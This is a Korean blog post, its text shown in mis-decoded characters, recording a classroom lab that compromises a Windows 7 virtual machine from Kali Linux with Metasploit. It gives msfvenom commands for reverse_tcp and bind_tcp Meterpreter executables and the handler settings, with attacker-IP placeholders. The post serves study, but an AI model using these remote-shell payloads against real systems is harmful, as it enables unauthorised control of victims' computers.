[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ7 OS ์นจํˆฌ ์ž‘์—…

2024. 3. 5. 00:11ยท๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น
๋ชฉ์ฐจ
  1. 01. reverse ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น
  2. 02. bind ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น
728x90
๋ฐ˜์‘ํ˜•

! ์ด ํฌ์ŠคํŠธ์˜ ๋‚ด์šฉ์€ ์ „๊ณต ๊ฐ•์˜์—์„œ ๋‹ค๋ฃฌ ๋ฆฌ๋ˆ…์Šค ๋ณด์•ˆ ์‹ค์Šต์˜ ๊ธฐ๋ก์šฉ์ด๋ฉฐ, ์ด๋Š” ํ•™์Šต ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

! ์–ด๋– ํ•œ ๊ฒฝ์šฐ์—๋„ ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์•…์šฉํ•˜๊ฑฐ๋‚˜ ๋ถˆ๋ฒ•์ ์ธ ํ™œ๋™์— ์‚ฌ์šฉํ•ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค.

 

! ๋ชจ์˜ ํ•ดํ‚น๊ณผ ๊ด€๋ จ๋œ ์‹ค์Šต์€ ํ•ฉ๋ฒ•์ ์ธ ํ™˜๊ฒฝ์—์„œ๋งŒ ์ˆ˜ํ–‰๋˜์–ด์•ผ ํ•˜๋ฉฐ, ๋ฌด๋‹จ์œผ๋กœ ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๋Š” ๋“ฑ์˜ ํ–‰์œ„๋Š” ๋ฒ•์ ์ธ ๋ฌธ์ œ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์—๋Š” ํ•ญ์ƒ ์œค๋ฆฌ์ ์ธ ์ฑ…์ž„์„ ๊ฐ–๊ณ  ํ–‰๋™ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

 


 

๐Ÿ“ ์‹ค์Šต ์ „ ์šฉ์–ด ์ •๋ฆฌ 

  ยท Reverse TCP

   - (์—ฐ๊ฒฐ ์‹œ์ž‘ ์ฃผ์ฒด) ๊ณต๊ฒฉ ๋Œ€์ƒ ์‹œ์Šคํ…œ์ด ์—ฐ๊ฒฐ์„ ์‹œ์ž‘

   - (์—ฐ๊ฒฐ ๋ฐฉํ–ฅ) ๊ณต๊ฒฉ์ž๋Š” Meterpreter๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ ์ž์‹ ์˜ ์‹œ์Šคํ…œ์—์„œ ์—ฐ๊ฒฐ์„ ๋Œ€๊ธฐ

 

  ยท Bind TCP

   - (์—ฐ๊ฒฐ ์‹œ์ž‘ ์ฃผ์ฒด) ๊ณต๊ฒฉ์ž๊ฐ€ ์—ฐ๊ฒฐ์„ ์‹œ์ž‘

   - (์—ฐ๊ฒฐ ๋ฐฉํ–ฅ) ๊ณต๊ฒฉ์ž์˜ ์‹œ์Šคํ…œ์—์„œ ๊ณต๊ฒฉ ๋Œ€์ƒ ์‹œ์Šคํ…œ์œผ๋กœ์˜ ์—ฐ๊ฒฐ

 


  •  ์‹ค์Šต ํ™˜๊ฒฝ
    • (๊ฐ€์ƒ ํ™˜๊ฒฝ VMware Workstation
    • (๊ณต๊ฒฉ์ž PC) Kali Linux
    • (๊ณต๊ฒฉ ๋Œ€์ƒ PC) Windows 7

01. reverse ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น

 

  01-01. ๊ณต๊ฒฉ์ž PC ํ™˜๊ฒฝ ์„ค์ •

    - ์•…์„ฑ์ฝ”๋“œ ๋‹ค์šด์„ ์œ„ํ•œ Apache2 ์„œ๋ฒ„ ์˜คํ”ˆ

~# service apache2 start
~# service apache2 status

 


  01-02. msfvenom ๋ช…๋ น์–ด๋กœ ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์ƒ์„ฑ

      * msfvenom = Metasploit์˜ Payload Generator๋กœ, ๋‹ค์–‘ํ•œ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋จ

        ํŽ˜์ด๋กœ๋“œ๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ์ฃผ์ž…ํ•˜๊ณ  ์‹คํ–‰ํ•  ์ฝ”๋“œ๋ฅผ ์˜๋ฏธ.

        ์ผ๋ฐ˜์ ์œผ๋กœ ์›๊ฒฉ ์‰˜/๋ช…๋ น ์‰˜์„ ํฌํ•จํ•œ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ

 

     * ์ผ๋ฐ˜์ ์ธ msfvenom์˜ ๊ตฌ๋ฌธ

msfvenom -p [Payload] [Options]

 

 

    - reverse ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์ƒ์„ฑ

 

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[๊ณต๊ฒฉ์ž IP] -f exe -o reverse_path.exe

 

  * ์ด ๋ช…๋ น์€ Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ  Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ reverse TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๊ณ , ํ•ด๋‹น ํŽ˜์ด๋กœ๋“œ๋ฅผ reverse_path.exe๋ผ๋Š” ์ด๋ฆ„์˜ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ํŒŒ์ผ๋กœ ์ €์žฅํ•œ๋‹ค. ์ด ํŒŒ์ผ์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์„ค์ •ํ•œ LHOST(๊ณต๊ฒฉ์ž IP)๋กœ๋ถ€ํ„ฐ Meterpreter ์…ธ์— ์ ‘๊ทผํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋‹ค.

 

  ๋ช…๋ น์–ด ๊ฐ ์˜ต์…˜์˜ ์—ญํ• ์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

 

  ' -p windows/meterpreter/reverse_tcp '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑํ•˜๋ จ๋Š” ํŽ˜์ด๋กœ๋“œ์˜ ์œ ํ˜•์„ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterprter ์…ธ์„ ์‚ฌ์šฉํ•˜์—ฌ Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ reverse TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋ ค๋Š” ๊ฒƒ์ž„

  ' LHOST=[๊ณต๊ฒฉ์ž  IP] '

    - ์ด ์˜ต์…˜์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์—ฐ๊ฒฐ์„ ๊ธฐ๋‹ค๋ฆฌ๋Š” IP ์ฃผ์†Œ๋ฅผ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter๊ฐ€ ์—ฐ๊ฒฐ๋˜๊ธฐ ์œ„ํ•ด ๊ณต๊ฒฉ ๋Œ€์ƒ ์‹œ์Šคํ…œ์ด ์—ฐ๊ฒฐํ•ด์•ผ ํ•˜๋Š” IP ์ฃผ์†Œ, ์ฆ‰ ๊ณต๊ฒฉ์ž IP ์ฃผ์†Œ๋ฅผ ์ œ๊ณตํ•ด์•ผ ํ•จ

  ' -f exe '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑ๋œ ํŒŒ์ผ์˜ ํ˜•์‹์„ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” ์‹คํ–‰๊ฐ€๋Šฅํ•œ Windows ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ(.exe)ํŒŒ์ผ ํ˜•์‹์„ ์„ ํƒํ•จ

  ' -o reverse_path.exe '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑ๋œ ํŽ˜์ด๋กœ๋“œ ํŒŒ์ผ์˜ ์ด๋ฆ„๊ณผ ๊ฒฝ๋กœ๋ฅผ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” ์ƒ์„ฑ๋œ ํŒŒ์ผ์„ reverse_path.exe๋กœ ์ €์žฅํ•  ๊ฒƒ์ž„


  01-03. Metasploit์„ ์‚ฌ์šฉํ•˜์—ฌ reverse ๊ณต๊ฒฉ ๋ช…๋ น์–ด ์‹คํ–‰

    - ๋ช…๋ น์–ด ์ž…๋ ฅ์„ ์œ„ํ•œ msfconsole ์‹คํ–‰

 

    - reverse TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ๊ณต๊ฒฉ ์ˆ˜ํ–‰ ๋ช…๋ น์–ด

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST [๊ณต๊ฒฉ์ž IP]
> set ExitSession false
> exploit -j

 

  ยท ' use exploit/multi/handler ' 

    - Metasploit์—์„œ ์—ญํ• ์„ ์ˆ˜ํ–‰ํ•  exploit ๋ชจ๋“ˆ์„ ์„ ํƒ

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์ค‘ ํ”Œ๋žซํผ์— ๋Œ€ํ•œ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ฒ ๋‹ค๋Š” ๊ฒƒ์„ ๋‚˜ํƒ€๋ƒ„

 

  ยท ' set payload windows/meterpreter/reverse_tcp ' 

    - ์„ ํƒํ•œ exploit ๋ชจ๋“ˆ์— ๋Œ€ํ•œ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ค์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ reverse TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ ํƒ

 

  ยท ' set LHOST [๊ณต๊ฒฉ์ž IP] '

    - ๊ณต๊ฒฉ์ž๊ฐ€ ์—ฐ๊ฒฐ์„ ๊ธฐ๋‹ค๋ฆฌ๋Š” IP ์ฃผ์†Œ๋ฅผ ์„ค์ • = ๊ณต๊ฒฉ์ž IP

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์—ฐ๊ฒฐ๋˜๊ธฐ ์œ„ํ•ด ๊ณต๊ฒฉ ๋Œ€์ƒ ์‹œ์Šคํ…œ์ด ์—ฐ๊ฒฐํ•ด์•ผํ•˜๋Š” IP ์ฃผ์†Œ๋ฅผ ์ œ๊ณต

 

  ยท ' set Exitsession false ' 

    - Meterpreter ์„ธ์…˜์„ ์ข…๋ฃŒํ•  ๋•Œ  Metasploit์ด ์ž๋™์œผ๋กœ ์ข…๋ฃŒ๋˜๋„๋ก ์„ค์ •ํ•จ

    - Meterpreter ์„ธ์…˜์„ ์œ ์ง€ํ•˜๊ณ  ์ถ”๊ฐ€์ ์ธ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ๊ฒƒ

 

  ยท ' exploit -j ' 

    - ์„ค์ •ํ•œ exploit์„ ์‹คํ–‰ํ•˜๊ณ  ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•จ

    - '-j' ์˜ต์…˜์€ exploit์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ์—์„œ ์‹คํ–‰ํ•˜๊ณ  ์ œ์–ด๋ฅผ ๋‹ค์‹œ ํ„ฐ๋ฏธ๋„๋กœ ๋ฐ˜ํ™˜ํ•จ

 

์ด๋Ÿฌํ•œ ๊ณผ์ •์„ ํ†ตํ•ด Metasploit์€ Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์„ค์ •ํ•œ IP ์ฃผ์†Œ๋กœ๋ถ€ํ„ฐ Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ reverse TCP ์—ฐ๊ฒฐ์„ ๋Œ€๊ธฐํ•˜๊ณ , ์„ฑ๊ณต์ ์œผ๋กœ ์—ฐ๊ฒฐ๋˜๋ฉด Meterpreter ์„ธ์…˜์„ ์ œ๊ณตํ•œ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๋Š” ํ•ด๋‹น ์‹œ์Šคํ…œ์—์„œ ๋‹ค์–‘ํ•œ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค.

 


  01-04. Windows์—์„œ ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ ์ˆ˜ํ–‰

    - reverse_path.exe ํŒŒ์ผ์„ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์œผ๋กœ ์‹คํ–‰

 

    - ๊ณต๊ฒฉ์ž PC(Kali)์—์„œ ์—ฐ๊ฒฐ๋œ ๊ณต๊ฒฉ ๋Œ€์ƒ(Windows) IP ํ™•์ธ

 

    - ์„ธ์…˜ ๋ฆฌ์ŠคํŠธ ํ™•์ธํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ IP ํ™•์ธํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ ์„ ํƒ

 

    - screenshot ๋ช…๋ น์–ด ์‚ฌ์šฉํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ PC ํ™”๋ฉด ์บก์ณ ๊ฐ€๋Šฅ

 


 

02. bind ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น

  02-01. ๊ณต๊ฒฉ์ž PC ํ™˜๊ฒฝ ์„ค์ •

    - 01-01๊ณผ ๋™์ผ

 


  02-02. msfvenom ๋ช…๋ น์–ด๋กœ ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์ƒ์„ฑ

    - bind ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์ƒ์„ฑ

~# msfvenom -p windows/meterpreter/bind_tcp -f exe -o bind_patch.exe

 

  * ์ด ๋ช…๋ น์€ Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ  Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ bind TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๊ณ , ํ•ด๋‹น ํŽ˜์ด๋กœ๋“œ๋ฅผ bind_path.exe๋ผ๋Š” ์ด๋ฆ„์˜ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ํŒŒ์ผ๋กœ ์ €์žฅํ•œ๋‹ค. ์ด ํŒŒ์ผ์€ ํŠน์ • ํฌํŠธ์—์„œ ๋Œ€๊ธฐํ•˜๊ณ  ์žˆ๋Š” Meterpreter ์…ธ์— ์—ฐ๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋‹ค.

 

  ๋ช…๋ น์–ด ๊ฐ ์˜ต์…˜์˜ ์—ญํ• ์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

 

  ' -p windows/meterpreter/bind_tcp '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑํ•˜๋ ค๋Š” ํŽ˜์ด๋กœ๋“œ์˜ ์œ ํ˜•์„ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterprter ์…ธ์„ ์‚ฌ์šฉํ•˜์—ฌ Windows ์‹œ์Šคํ…œ์—์„œ bind TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋ ค๋Š” ๊ฒƒ์ž„

    - bind tcp ์—ฐ๊ฒฐ์€ ํŠน์ • ํฌํŠธ์—์„œ ์—ฐ๊ฒฐ์„ ๋Œ€๊ธฐํ•˜๊ณ , ์—ฐ๊ฒฐ์ด ์ด๋ฃจ์–ด์ง€๋ฉด Meterpreter ์…ธ์„ ์‹คํ–‰

  ' -f exe '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑ๋œ ํŒŒ์ผ์˜ ํ˜•์‹์„ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” ์‹คํ–‰๊ฐ€๋Šฅํ•œ Windows ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ(.exe)ํŒŒ์ผ ํ˜•์‹์„ ์„ ํƒ

  ' -o bind_path.exe '

    - ์ด ์˜ต์…˜์€ ์ƒ์„ฑ๋œ ํŽ˜์ด๋กœ๋“œ ํŒŒ์ผ์˜ ์ด๋ฆ„๊ณผ ๊ฒฝ๋กœ๋ฅผ ์ง€์ •

    - ์—ฌ๊ธฐ์„œ๋Š” ์ƒ์„ฑ๋œ ํŒŒ์ผ์„ bind_path.exe๋กœ ์ €์žฅํ•  ๊ฒƒ์ž„

 


  02-03. Metasploit์„ ์‚ฌ์šฉํ•˜์—ฌ bind ๊ณต๊ฒฉ ๋ช…๋ น์–ด ์‹คํ–‰

    - ๋ช…๋ น์–ด ์ž…๋ ฅ์„ ์œ„ํ•œ msfconsole ์‹คํ–‰

    - bind TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ๊ณต๊ฒฉ ์ˆ˜ํ–‰ ๋ช…๋ น์–ด

> use exploit/multi/handler
> set payload windows/meterpreter/bind_tcp
> set LHOST [๊ณต๊ฒฉ์ž IP]
> set LPORT [๊ณต๊ฒฉ์ž Port]
> set RHOST [๊ณต๊ฒฉ๋Œ€์ƒ IP]
> set RPORT [๊ณต๊ฒฉ๋Œ€์ƒ Port]
> set ExitSession false
> exploit -j

 

  ยท ' use exploit/multi/handler ' 

    - Metasploit์—์„œ ์—ญํ• ์„ ์ˆ˜ํ–‰ํ•  exploit ๋ชจ๋“ˆ์„ ์„ ํƒ

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์ค‘ ํ”Œ๋žซํผ์— ๋Œ€ํ•œ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ฒ ๋‹ค๋Š” ๊ฒƒ์„ ๋‚˜ํƒ€๋ƒ„

 

  ยท ' set payload windows/meterpreter/bind_tcp ' 

    - ์„ ํƒํ•œ exploit ๋ชจ๋“ˆ์— ๋Œ€ํ•œ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ค์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Windows ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ bind TCP ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ ํƒ

 

  ยท ' set LHOST [๊ณต๊ฒฉ์ž IP] '

    - ๊ณต๊ฒฉ์ž๊ฐ€ ์—ฐ๊ฒฐ์„ ๊ธฐ๋‹ค๋ฆฌ๋Š” IP ์ฃผ์†Œ๋ฅผ ์„ค์ • = ๊ณต๊ฒฉ์ž IP

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์—ฐ๊ฒฐ๋˜๊ธฐ ์œ„ํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์‚ฌ์šฉํ•  IP ์ฃผ์†Œ๋ฅผ ์ œ๊ณต

 

  ยท ' set LPORT [๊ณต๊ฒฉ์ž Port] '

    - ๊ณต๊ฒฉ์ž๊ฐ€ Meterpreter ์„ธ์…˜์„ ์ˆ˜์‹ ํ•˜๊ธฐ ์œ„ํ•ด ๋Œ€๊ธฐํ•  ํฌํŠธ ๋ฒˆํ˜ธ๋ฅผ ์„ค์ •

 

  ยท ' set RHOST [๊ณต๊ฒฉ ๋Œ€์ƒ IP] '

    - ๊ณต๊ฒฉ ๋Œ€์ƒ์˜ IP ์ฃผ์†Œ๋ฅผ ์„ค์ •

    - ์—ฌ๊ธฐ์„œ๋Š” Meterpreter ํŽ˜์ด๋กœ๋“œ๋ฅผ ์‹คํ–‰ํ•  Windows ์‹œ์Šคํ…œ์˜ IP ์ฃผ์†Œ๋ฅผ ์ œ๊ณต

 

  ยท ' set RPORT [๊ณต๊ฒฉ ๋Œ€์ƒ Port] '

    - ๊ณต๊ฒฉ ๋Œ€์ƒ์˜ ํฌํŠธ ๋ฒˆํ˜ธ๋ฅผ ์„ค์ •

 

  ยท ' set Exitsession false ' 

    - Meterpreter ์„ธ์…˜์„ ์ข…๋ฃŒํ•  ๋•Œ  Metasploit์ด ์ž๋™์œผ๋กœ ์ข…๋ฃŒ๋˜๋„๋ก ์„ค์ •ํ•จ

    - Meterpreter ์„ธ์…˜์„ ์œ ์ง€ํ•˜๊ณ  ์ถ”๊ฐ€์ ์ธ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ๊ฒƒ

 

  ยท ' exploit -j ' 

    - ์„ค์ •ํ•œ exploit์„ ์‹คํ–‰ํ•˜๊ณ  ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•จ

    - '-j' ์˜ต์…˜์€ exploit์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ์—์„œ ์‹คํ–‰ํ•˜๊ณ  ์ œ์–ด๋ฅผ ๋‹ค์‹œ ํ„ฐ๋ฏธ๋„๋กœ ๋ฐ˜ํ™˜ํ•จ

 

  ์ด๋Ÿฌํ•œ ๊ณผ์ •์„ ํ†ตํ•ด Metasploit์€ Meterpreter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์„ค์ •ํ•œ IP ์ฃผ์†Œ์™€ bind TCP ์—ฐ๊ฒฐ์„ ๊ธฐ๋‹ค๋ฆฌ๊ณ , ์„ฑ๊ณต์ ์œผ๋กœ ์—ฐ๊ฒฐ๋œ๋ฉด Meterpreter ์„ธ์…˜์„ ์ œ๊ณตํ•œ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๋Š” ํ•ด๋‹น ์‹œ์Šคํ…œ์—์„œ ๋‹ค์–‘ํ•œ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค.

 


  02-04. Windows์—์„œ ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ ์ˆ˜ํ–‰

    - ๊ณต๊ฒฉ์ž PC(Kali)์—์„œ ์—ฐ๊ฒฐ๋œ ๊ณต๊ฒฉ ๋Œ€์ƒ(Windows) IP ํ™•์ธ

    - ์„ธ์…˜ ๋ฆฌ์ŠคํŠธ ํ™•์ธํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ IP ํ™•์ธํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ ์„ ํƒ

    - keyboard_send ๋ช…๋ น์–ด ์‚ฌ์šฉํ•˜์—ฌ ๊ณต๊ฒฉ ๋Œ€์ƒ PC์— keyboard ์ œ์–ด ๊ฐ€๋Šฅ

728x90
๋ฐ˜์‘ํ˜•

'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด > ๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ  (0) 2025.02.06
[๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ  (0) 2024.06.03
[๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต  (1) 2024.06.03
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8 ์žฌ๋ถ€ํŒ… ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹คํ–‰  (0) 2024.03.05
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8/์œˆ๋„์šฐ10 OS ์นจํˆฌ ์ž‘์—…  (0) 2024.03.05
  1. 01. reverse ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น
  2. 02. bind ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์‚ฌ์šฉํ•œ windows 7 ํ•ดํ‚น
'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
  • [๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต
  • [๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8 ์žฌ๋ถ€ํŒ… ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹คํ–‰
  • [๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8/์œˆ๋„์šฐ10 OS ์นจํˆฌ ์ž‘์—…
WISHee
WISHee
IT์™€ ๋ณด์•ˆ์— ๋Œ€ํ•œ ๊ณต๋ถ€ ๊ธฐ๋ก์„ ์ฐจ๊ณก์ฐจ๊ณก ์Œ“์•„๊ฐ€๋Š” ๊ธฐ์ˆ  ๋ธ”๋กœ๊ทธ ๐Ÿ›ก๏ธ๐Ÿ’ป
  • WISHee
    DevwithWish
    WISHee
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๐ŸŒณ ROOT (128)
      • โ›“๏ธ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ (10)
        • ๊ธฐ๋ณธ ๊ฐœ๋… (9)
        • ํŒจํ‚ท ๋ถ„์„ (1)
        • ์นจ์ž… ํƒ์ง€ ๋ฐ ๋ฐฉ์ง€ (0)
      • โš™๏ธ ์‹œ์Šคํ…œ ๋ณด์•ˆ (0)
        • ์šด์˜์ฒด์ œ ๋ณด์•ˆ (0)
        • ์ทจ์•ฝ์  ๋ถ„์„ (0)
        • ๋กœ๊ทธ ๋ถ„์„ (0)
      • ๐ŸŒ ์›น ๋ณด์•ˆ (1)
        • OWASP TOP 10 (1)
        • ์›น ์„œ๋ฒ„ ๋ณด์•ˆ (0)
        • ์›น ์ทจ์•ฝ์  ๋ถ„์„ (0)
      • โ˜๏ธ ํด๋ผ์šฐ๋“œ ๋ณด์•ˆ (3)
        • AWS (3)
      • ๐Ÿ” ์•”ํ˜ธํ™” & ์ธ์ฆ (3)
        • ์•”ํ˜ธํ™” ๊ฐœ๋… (2)
        • TLS,SSL (0)
        • ์ธ์ฆ & ์ ‘๊ทผ์ œ์–ด (1)
      • ๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด (30)
        • ๋ณด์•ˆ ๊ด€์ œ (14)
        • ๋ชจ์˜ ํ•ดํ‚น (12)
        • ์ทจ์•ฝ์  ์ง„๋‹จ (3)
        • ๋””์ง€ํ„ธํฌ๋ Œ์‹ (1)
      • ๐Ÿ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P ์ธ์ฆ (2)
      • ๐Ÿ“ฐ ๋ณด์•ˆ ๋‰ด์Šค & ํŠธ๋ Œ๋“œ (1)
        • ์ตœ์‹  ๋ณด์•ˆ ์ด์Šˆ (1)
        • ์‚ฌ์ด๋ฒ„ ์œ„ํ˜‘ ์ •๋ณด (0)
        • ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค ๋ฆฌ๋ทฐ (0)
      • ๐Ÿ”ฅ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • ๊ณผ์ œ (4)
        • ๋ชจ๋“ˆ ํ”„๋กœ์ ํŠธ (8)
        • ์ตœ์ข… ํ”„๋กœ์ ํŠธ (0)
      • ๐Ÿ—‚๏ธ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • ๐Ÿงฉ Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
